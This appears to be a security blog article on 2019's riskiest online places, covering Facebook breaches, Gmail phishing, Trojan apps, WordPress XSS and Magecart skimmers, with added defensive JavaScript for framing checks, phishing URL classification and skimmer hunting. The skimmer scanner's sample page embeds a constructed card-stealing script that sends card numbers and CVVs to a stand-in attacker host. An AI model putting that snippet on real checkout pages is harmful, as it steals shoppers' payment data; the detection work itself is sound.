A few years back, in 2016, we decided to analyze the most dangerous online places, which were represented not only by suspicious locations but also by legitimate websites and services.
In truth, things haven’t changed for the better since 2016, as we’ve been continuously witnessing some of the biggest and most devastating cyberattacks and data breaches, each surpassing the preceding one.
Where does this “backward evolution” leave us, the users? We’re still as dependent on social media and digital services as we were a few years ago, and maybe even a tad more. This dependency on “the online realm” has created a very modern paradox: despite knowing the cybersecurity risks and privacy pitfalls of, let’s say, Facebook, we’re still there, voluntarily agreeing to share our personal experiences, photographs, travels and locations.
Speaking of Facebook, the social platform has been through a lot, especially since the GDPR came into force in May 2018. A dozen privacy breaches and scandals later, Facebook is definitely not the dreamland of online socializing anymore, and it has earned a top spot among 2019’s most dangerous online places.
Ever since the infamous Cambridge Analytica scandal (for which the tech giant was fined £500,000 by the UK Information Commissioner’s Office in October 2018), the platform has been treading more carefully. The scandal, together with the passage of GDPR, compelled Facebook to add more options to its privacy settings that give users more choice in how their personal data is collected and used.
Despite these actions, Facebook suffered another big security breach in September 2018, when up to 50 million accounts were exposed due to a vulnerability in the ‘View As’ feature. Unlike the Cambridge Analytica event, this was a vulnerability within Facebook itself: the bug let attackers obtain other users’ access tokens (the credentials that keep a session logged in) and, with those, directly take over accounts without ever needing a password.
While Facebook admitted its mistake and acted promptly to resolve the issue, its actions were less than transparent.
Rather than directly alerting users about the hack, Facebook simply sent affected users a cryptic message on their news feed that read “Your privacy and security are important to us. We want to let you know about recent action we’ve taken to secure your account.” Unfortunately, the message sounded like the usual we-care-about-your-privacy bunk that Facebook feeds us all the time, our guest blogger Shachar Shamir wrote in a story on
Facebook’s misfortunes don’t end here. Being very popular on a global scale, Facebook continues to be abused by cybercriminals for the purpose of spreading malware and scams. The so-called Facebook virus is not one piece of malware but a series of scams that have been circulating on the social network. Users are flooded with fake ads that usually try to get them to watch a video or visit a suspicious page. Clickbait techniques are the norm when cyber crooks attempt to plant malware on users’ machines through Facebook or other widely used social networks.
A security researcher known as Lasq published proof-of-concept code for a fully functional Facebook worm. The PoC relies on a specific security vulnerability in the mobile version of the Facebook sharing pop-up. Fortunately, the desktop version of the platform is not affected, but that does not make the issue any less alarming. According to the researcher, the mobile sharing dialog is vulnerable to clickjacking: it can be loaded inside an attacker-controlled iframe and overlaid with bait, so that a tap intended for the attacker’s page actually lands on the hidden “Share” button. The standard defence against this class of bug is to refuse cross-origin framing with an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive; a page that can be framed by any origin is a candidate for exactly this attack. It is important to note that the flaw has been abused in real-world attacks by a group that distributes spam. The group has been posting spam links on the walls of Facebook users, and it is yet another example of why Facebook is becoming more dangerous by the day.
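The following is an added example written for this article, not code from the original post or from Lasq’s proof of concept. It models the precondition for the clickjacking described above: whether a page can be loaded inside a cross-origin iframe at all. Browsers decide that from two response headers, CSP frame-ancestors (which takes precedence) and X-Frame-Options, and the function reproduces those rules. The header sets, page origin and attacker origin are constructed for the example and are not captured from Facebook.

```javascript
// Added example: decide from response headers whether a page can be framed by a
// given embedder origin. Sample headers and origins below are constructed.

// Lowercase header names so lookups are case-insensitive (HTTP headers are).
function lowerHeaders(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Match one frame-ancestors host- or scheme-source against the embedder origin.
// Supports the "https:", "host", "https://host" and "*.host" forms.
function sourceMatches(src, embedder) {
  const s = src.replace(/'/g, '').toLowerCase();
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return embedder.protocol === s;
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/);
  if (!m) return false;
  const [, scheme, host] = m;
  if (scheme && embedder.protocol !== scheme + ':') return false;
  if (host.startsWith('*.')) return embedder.hostname.endsWith(host.slice(1));
  return host === embedder.hostname;
}

// True if a page served with `headers` at `pageOrigin` can be framed by a
// document at `embedderOrigin`. True for an untrusted embedder means the page
// is exposed to overlay / clickjacking attacks.
function isFramable(headers, pageOrigin, embedderOrigin) {
  const h = lowerHeaders(headers);
  const embedder = new URL(embedderOrigin);
  const sameOrigin = new URL(pageOrigin).origin === embedder.origin;

  const csp = h['content-security-policy'];
  if (csp) {
    for (const directive of csp.split(';')) {
      const [name, ...sources] = directive.trim().split(/\s+/);
      if (!name || name.toLowerCase() !== 'frame-ancestors') continue;
      // When frame-ancestors is present, X-Frame-Options is ignored.
      return sources.some(src => {
        const s = src.replace(/'/g, '').toLowerCase();
        if (s === 'none') return false;
        if (s === 'self') return sameOrigin;
        return sourceMatches(src, embedder);
      });
    }
  }

  const xfo = h['x-frame-options'];
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === 'DENY') return false;
    if (v === 'SAMEORIGIN') return sameOrigin;
    // ALLOW-FROM is obsolete and ignored by current browsers; any other value
    // is invalid. Both leave the page unprotected.
    return true;
  }
  return true; // no framing policy at all: anyone can embed the page
}

// Constructed header sets for a hypothetical mobile share dialog.
const SAMPLE_HEADERS = {
  unprotected: { 'Content-Type': 'text/html' },
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  xfoSameOrigin: { 'x-frame-options': 'sameorigin' },
  cspAllowlist: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.example.com" },
  cspNoneWinsOverXfo: { 'Content-Security-Policy': "frame-ancestors 'none'", 'X-Frame-Options': 'ALLOWALL' },
};

const PAGE = 'https://m.example.com';       // assumed origin of the share dialog
const ATTACKER = 'https://attacker.test';   // assumed origin of the bait page
for (const [name, headers] of Object.entries(SAMPLE_HEADERS)) {
  console.log(`${name}: framable by ${ATTACKER}? ${isFramable(headers, PAGE, ATTACKER)}`);
}
```

Only the `unprotected` set (and an obsolete `ALLOW-FROM`) lets the attacker origin frame the page; that is the state a clickjacking PoC needs, and it is also the condition a scanner should flag on any endpoint that performs a state-changing action on a click.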
Social Media, Altogether
A new study carried out by Bromium and Dr. Mike McGuire estimates that cybercrime enabled by social media (Facebook, Twitter, LinkedIn, Instagram) generates at least $3.25 billion in global revenue annually. The report, published in February 2019, is built around three key questions: “how revenues are generated and which revenues are the most lucrative at present; how revenues are being moved around or laundered; and where revenues are spent or converted into other assets or activities”.
The report also pays attention to the range of malicious services offered openly on social networks, such as hacking tools, botnets for hire and cryptocurrency scams. Crimes based on social media have grown significantly, and so has the risk of using it: one in five organizations has been attacked by malware delivered via social media.
Financial motivation is the single most important driver of both the form and the spread of cybercrime, the report notes. However, the “cybercrime as a business” framing is no longer adequate to capture its complexity. This is where the so-called “Web of Profit” comes into play: “a hyper-connected range of economic agents, economic relationships and other factors now capable of generating, supporting and maintaining criminal revenues at unprecedented scale“.
In short, social media-enabled cybercrime is generating $3.25 billion annually. As for the number of affected individuals, 1.3 billion social media users have been affected within the past five years. It is also highly likely that some 50 percent of illegal data trading in 2017-2018 can be traced to social media hacks and data breaches.
In 2017, security researchers at Wordfence detected a highly effective and widely spread phishing technique stealing login credentials for Gmail and other services. On the surface it is your average phishing scam: the attacker sends an email to a Gmail account. The email appears to come from someone the target knows, because that person’s account has already been hacked, and it carries what looks like an image attachment. Clicking the image to preview it opens a new tab in which the user is prompted to sign in to Gmail again. The location bar appears to show accounts.google.com, so even an experienced eye may be misled. In the variant Wordfence documented, the address was in fact a data:text/html URL whose content began with the string “https://accounts.google.com/…”; the real scheme was visible only at the very start of the bar, followed by a long run of whitespace and script that rendered the fake sign-in page.
Once the sign-in is completed, the targeted account is compromised. The whole process happens very quickly, and it is either automated or the attackers are on standby, processing the compromised accounts. Once access to an account is obtained, the attacker has full access to all the victim’s emails and also gains access to every other service reachable via the password reset mechanism: other email accounts, software-as-a-service logins, and so on.
Phishers are constantly improving their tactics. According to recent reports by security vendors, phishing websites increasingly use valid TLS certificates, so the page loads over HTTPS with a padlock, in an attempt to fool users. Another bothersome trend is that the payment sector is subject to phishing scams more than ever before: it was the most targeted sector in Q3 2018, followed by SaaS/webmail and financial institutions.
We’ve created a 2019 phishing guide which we regularly update with the most recent phishing scams.
NOTE. All popular 2019 phishing scams are deployed via email messages. Recipients are sent messages disguised as legitimate notifications from a service, program, product or another party, claiming that a certain type of interaction is required. Most of the time the scams concern account activity, fraudulent transactions or password reset reminders.
All of these may be legitimate reasons for sending activity messages, so they are easily confused with real notifications. In almost all cases the landing pages use similar-sounding domain names and valid TLS certificates; since free domain-validated certificates are issued to anyone who controls a domain, the padlock proves only that the connection is encrypted, not who is on the other end. The layout, design elements and text of the legitimate site are also commonly copied. So be extremely careful with any convincing-looking but unexpected email that shows up in your inbox, especially when “urgent activities” are required.
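Both the Gmail case above (a trusted hostname shown as decoration inside a non-web URL) and the lookalike-domain pattern in the note call for the same check, so here is one added example, written for this article and not taken from Wordfence or from the original post. It parses what the location bar shows and reports what the browser will actually connect to: a data: URL carrying a trusted hostname as text, a user@ prefix hiding the real host, a trusted brand buried in a subdomain, and a one- or two-character typosquat. The allowlist of trusted domains, the sample addresses and the attacker domains are all constructed for the example.

```javascript
// Added example: classify a location-bar string by what the browser will really
// talk to. Allowlist, samples and attacker hostnames below are constructed.

// Assumed allowlist of registrable domains the user actually trusts.
const TRUSTED_DOMAINS = ['google.com', 'paypal.com', 'facebook.com'];

// Last two labels of a hostname. Good enough for .com-style names; production
// code must use the Public Suffix List (bank.co.uk would otherwise become co.uk).
function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().split('.').filter(Boolean);
  return labels.slice(-2).join('.');
}

// Edit distance, used to catch one- or two-character typosquats (paypa1, gooogle).
function levenshtein(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,
        dp[i][j - 1] + 1,
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1),
      );
    }
  }
  return dp[a.length][b.length];
}

// Classify a location-bar string. The verdict deliberately never depends on
// https: a padlock proves an encrypted connection, not who owns the domain.
function inspectAddress(text, trusted = TRUSTED_DOMAINS) {
  let url;
  try { url = new URL(text.trim()); } catch (e) { return { verdict: 'unparseable', host: null }; }
  const https = url.protocol === 'https:';
  if (url.protocol !== 'https:' && url.protocol !== 'http:') {
    return { verdict: 'not-a-web-origin', host: null, https,
             reason: `${url.protocol} URL; any hostname visible inside it is just text` };
  }
  const host = url.hostname;
  if (url.username || url.password) {
    return { verdict: 'suspicious', host, https, reason: 'text before @ is userinfo, not the host' };
  }
  const reg = registrableDomain(host);
  if (trusted.includes(reg)) {
    return { verdict: 'trusted-domain', host, https, reason: `${reg} is on the allowlist` };
  }
  for (const t of trusted) {
    const brand = t.split('.')[0];
    if (levenshtein(reg.split('.')[0], brand) <= 2 || host.includes(brand)) {
      return { verdict: 'lookalike', host, https, reason: `resembles or embeds ${t}` };
    }
  }
  return { verdict: 'unknown-domain', host, https, reason: 'not on the allowlist' };
}

// Constructed samples: what the bar showed versus what it meant.
const SAMPLES = [
  'https://accounts.google.com/ServiceLogin',
  'data:text/html,https://accounts.google.com/ServiceLogin?service=mail',
  'https://accounts.google.com@evil.test/login',
  'https://accounts.google.com.verify-login.test/',
  'https://paypa1.com/signin',
];
for (const s of SAMPLES) console.log(s, '=>', inspectAddress(s));
```

The key observation is that the WHATWG URL parser already knows the answer: for the data: form the `protocol` is `data:` and the `hostname` is empty, and for the user@ form the trusted-looking text lands in `username`, not `hostname`. A mail gateway or browser extension that wants to warn users should classify on those parsed fields, never on a substring match against the raw string.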
Google Play Store, Third Party App Stores
Third Party App Stores
Some malicious apps are worse than others, and such is the case with a battery optimization app designed to steal money from users’ PayPal accounts. The app was detected by ESET in December 2018 and was distributed outside Google Play. Nonetheless, security researchers have detected similar apps lurking in the Play Store as well; more specifically, five such apps were found in the official store targeting Brazilian users.
As for the battery optimization app that drained PayPal accounts, it hid an Android Trojan, and it is the Trojan that initiates PayPal money transfers without the user’s knowledge. Because the transfer is scripted through the Accessibility service rather than typed by a person, it completes within seconds, which is why the victim cannot stop the unwanted transaction once it has started.
During installation, the app requests the Android Accessibility service permission, which lets apps observe the screen and automate taps and other OS interactions on the user’s behalf. A very alarming permission, indeed, and one that no battery optimizer has any business asking for. Note, however, that the app does nothing until the user opens the official PayPal app and signs in; to speed that up, the Trojan may trigger notifications nudging the user to open PayPal on their device.
Google Play Store
In January 2019, Trend Micro researchers reported a number of malicious beauty camera apps for Android on the Google Play Store, some of which had been downloaded millions of times. The apps could contact remote ad configuration servers that could be used for malicious purposes, the researchers said.
The apps were grouped into two categories. Some of them were variations of the same camera app that beautifies photos, and the rest offered photo filters on users’ snapshots. Fortunately, the apps are now removed from Google Play, but this may come a little too late as they were already downloaded by millions of users.
Websites get compromised, and there is hardly a website that is a hundred percent secure against attacks. These attacks usually have one thing in common: they are not carried out by highly knowledgeable hackers but mainly by so-called “script kiddies”, inexperienced crooks who download automated toolkits and attempt to crack websites with easily exploitable vulnerabilities.
The ten categories of risk that enable most of these attacks are the ones catalogued in the OWASP Top 10 (2017 edition):
- SQL injection
- Broken authentication
- Exposure of sensitive data
- XML external entities
- Broken access control
- Security misconfiguration
- Cross-site scripting (XSS)
- Insecure deserialization
- Using components with known vulnerabilities
- Insufficient logging and monitoring
We have seen thousands of websites fall victim to these attacks. Let’s have a look at a recent example. A stored cross-site scripting (XSS) flaw was recently patched in version 5.2.0 of a popular WordPress plugin called Abandoned Cart Lite for WooCommerce. What was the attack about? Cybercriminals created a cart with fake contact information and then abandoned it. The names and emails were random, but the requests followed the same pattern: the generated first and last name were supplied together as billing_first_name, while the billing_last_name field carried the injected payload. Because the plugin stored that field and later rendered it into the abandoned-cart report without encoding it, the script executed in the browser of whichever administrator opened the report, with that administrator’s privileges. The purpose of these attacks was to drop two backdoors on victims’ systems. WordPress and Wix, among others, were also found to contain serious XSS flaws.
Magento-Based Online Stores
Thanks to the Magecart criminal group, websites running on Magento are constantly in danger. In August 2018 the respected security researcher Willem de Groot unearthed an extremely successful skimming campaign built around the MagentoCore skimmer. By the time it was discovered, the skimmer had already infected 7,339 Magento stores, making it the most aggressive campaign of its sort.
Note that the victims of this skimming malware include multi-million-dollar, publicly traded companies. In truth, though, it is the customers of these companies who have their cards and identities stolen.
“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months. The group hasn’t finished yet: new brands are hijacked at a pace of 50 to 60 stores per day over the last two weeks”, the researcher said back then.
Later, the same researcher found that Magecart malware re-infects websites even after they have been cleaned up. He has tracked Magecart-style infections on at least 40,000 domains over the past three years. During August, September and October 2018 alone, his MageReport scanner came across Magecart skimmers on more than 5,400 domains, and some of these infections proved quite persistent, staying on infected domains for up to 12.7 days.
As for the re-infections, the reasons are the following:
- The operators of Magecart often drop backdoors on hacked stores and create rogue admin accounts;
- The malware operators use efficient reinfection mechanisms such as database triggers and hidden periodic tasks;
- The operators also use obfuscation techniques to mask their code.
- The operators often use zero-day exploits to hack vulnerable sites.
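Cleaning a store is only half the job, as the list above shows; the other half is noticing the skimmer in the first place. The following added example is not Willem de Groot’s MageReport or any Magecart code. It is a client-side skimmer hunt over a checkout page’s HTML: it flags script tags that load from hosts outside the shop’s own domain and an allowlist of known vendors, and flags inline scripts that both read card fields and send data to a foreign host. The sample page, the store hostname, the vendor allowlist and the attacker hostnames are all constructed for the example.

```javascript
// Added example: hunt for Magecart-style skimmers in checkout-page HTML.
// FIRST_PARTY_HOST, ALLOWED_THIRD_PARTY and SAMPLE_PAGE are constructed.

const FIRST_PARTY_HOST = 'shop.example.test';                               // assumed store hostname
const ALLOWED_THIRD_PARTY = ['js.stripe.com', 'www.googletagmanager.com'];  // assumed vendor allowlist

function scanForSkimmers(html, firstParty = FIRST_PARTY_HOST, allow = ALLOWED_THIRD_PARTY) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = attrs.match(/\ssrc\s*=\s*["']?([^"'\s>]+)/i);
    if (src) {
      // Resolve relative URLs against the store so "/static/x.js" counts as first party.
      let host = null;
      try { host = new URL(src[1], `https://${firstParty}/`).hostname; } catch (e) { /* unparsable src */ }
      if (host && host !== firstParty && !allow.includes(host)) {
        findings.push({ kind: 'unexpected-external-script', host, src: src[1] });
      }
      continue;
    }
    // Inline script: does it touch payment fields AND ship data to a foreign host?
    const touchesPayment = /(card|cc_?num|cvv|cvc|expir|payment|checkout)/i.test(body);
    const hasSink = /\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b|new\s+Image\b|\.src\s*=/.test(body);
    const hosts = [...body.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map(x => x[1].toLowerCase());
    const foreign = [...new Set(hosts.filter(h => h !== firstParty && !allow.includes(h)))];
    if (touchesPayment && hasSink && foreign.length > 0) {
      findings.push({ kind: 'inline-exfil-candidate', hosts: foreign });
    }
  }
  return findings;
}

// Constructed checkout page: one first-party script, one allowlisted vendor,
// one injected inline skimmer and one injected external loader.
const SAMPLE_PAGE = `
<html><body>
<script src="/static/js/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<form id="checkout"><input id="card_number"><input id="cvv"></form>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    var d = document.getElementById('card_number').value + '|' +
            document.getElementById('cvv').value;
    new Image().src = 'https://collector.attacker.test/i.gif?d=' + btoa(d);
  });
</script>
<script src="https://cdn.attacker.test/mage.js"></script>
</body></html>`;

for (const f of scanForSkimmers(SAMPLE_PAGE)) console.log(JSON.stringify(f));
```

Run against a store’s rendered checkout page on a schedule and diff the findings; a new external host appearing between runs is the symptom to chase. This check only sees what the browser is served, so after a positive hit the server-side persistence the list above describes (rogue admin accounts, database triggers, cron entries, modified core files) still has to be hunted and removed, or the skimmer simply comes back.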
So, you should definitely pay attention to your online shopping habits, as Magento is perhaps the most popular ecommerce platform at the moment.
We won’t be talking about the general risks of visiting adult websites. Instead we will refer to statistics once again. According to a recent report by Kaspersky Lab, the number of malware strains prowling for login credentials on porn websites has tripled in 2018. The number of advertisements that sell access to hacked accounts on adult websites has doubled.
In 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world. The number of attacks almost tripled, to 850,000 infection attempts.
The most active malware found on adult portals was the so-called Jimmy Trojan. The preferred method of distribution of this malware strain is via email spam, the researchers said.
Pornhub and XNXX were the two adult portals where criminals mostly focused on stealing credentials. In comparison, in previous years login stealing malware was focused on more websites such as Brazzers, Chaturbate, Youporn, X-videos.
Kaspersky researchers also analyzed the top 20 Dark Web marketplaces and found more than 3,000 offers for credentials to porn portals. The researchers also found 29 websites hosting more than 15,000 packages for accounts on various adult portals, which is twice as much as compared to 2017.
Of course, this article doesn’t cover all the risks that the various online locations hide. However, it does highlight the top threat trends of which users should be fully aware. Whatever you do online, do it with caution.